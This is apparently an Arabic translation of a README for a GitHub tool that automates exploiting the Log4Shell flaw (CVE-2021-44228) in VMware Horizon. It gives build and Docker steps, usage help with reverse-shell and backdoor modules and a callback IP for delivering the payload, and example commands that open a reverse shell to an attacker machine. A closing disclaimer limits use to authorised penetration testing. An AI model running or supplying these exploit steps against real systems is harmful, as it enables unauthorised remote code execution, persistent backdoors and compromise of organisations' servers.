
استغلال CVE-2021-44228 في VMWare Horizon لتنفيذ الأوامر عن بُعد والمزيد.
استغلال CVE-2021-44228 في VMWare Horizon لتنفيذ الأوامر عن بُعد والمزيد.
الكود وملف README.md هذه المرة مشتتان بعض الشيء. تحديثات قادمة!
أدلة إثبات المفهوم لهذه الثغرة متناثرة ويجب تنفيذها يدويًا. هذا المستودع يؤتمت عملية الاستغلال. راجع منشور المدونة أعلاه للحصول على إرشادات حول مرحلة ما بعد الاستغلال.
يمكن استخدام هذا المستودع يدويًا أو عبر Docker.
لتنزيل وتشغيل أداة الاستغلال يدويًا، نفّذ الخطوات التالية. أولاً، تأكد من تثبيت Java و Maven على جهاز المهاجم. للقيام بذلك باستخدام apt على أنظمة التشغيل المبنية على Debian، نفّذ الأمر التالي:
apt update && apt install openjdk-11-jre maven
استنسخ مستودع GitHub وثبّت جميع متطلبات Python:
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
&& cd Log4jHorizon && pip3 install -r requirements.txt
من جذر مستودع Log4jHorizon، قم بتجميع مشروع Rogue-Jndi باستخدام الأمر التالي:
mvn package -f utils/rogue-jndi/
أولاً، تأكد من تثبيت Docker على جهاز الهجوم. (لن أرشدك خلال القيام بذلك)
بعد ذلك، نفّذ الأمر التالي لاستنساخ المستودع وبناء صورة Docker التي سنستخدمها.
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
&& cd Log4jHorizon && docker build -t Log4jHorizon .
لتشغيل الحاوية، نفّذ أمرًا مشابهًا للتالي مع إضافة وسائط سطر الأوامر الخاصة بك. لاحظ أن الحاوية لن تلتقط قشرة عكسية. تحتاج إلى إنشاء مستمع ncat في جلسة طرفية منفصلة:
docker run -it -p 1389:1389 Log4jHorizon \
-r -t horizon.acme.com -i 192.168.1.1 -p 4444
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]
optional arguments:
-h, --help show this help message and exit
-t URL, --target URL VMWare Horizon IP
-i CALLBACK, --ip CALLBACK
Callback IP for payload delivery and reverse shell.
-p PORT, --port PORT Callback port for reverse shell.
-r, --revshell Module to establish reverse shell using node.exe.
-b, --backdoor Module to add backdoor.
احصل على قشرة عكسية باستخدام الأداة المثبتة على نظامك المحلي:
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1
صُممت هذه الأداة للاستخدام أثناء اختبار الاختراق؛ استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يتحملون مسؤولية أي إساءة استخدام لهذا البرنامج.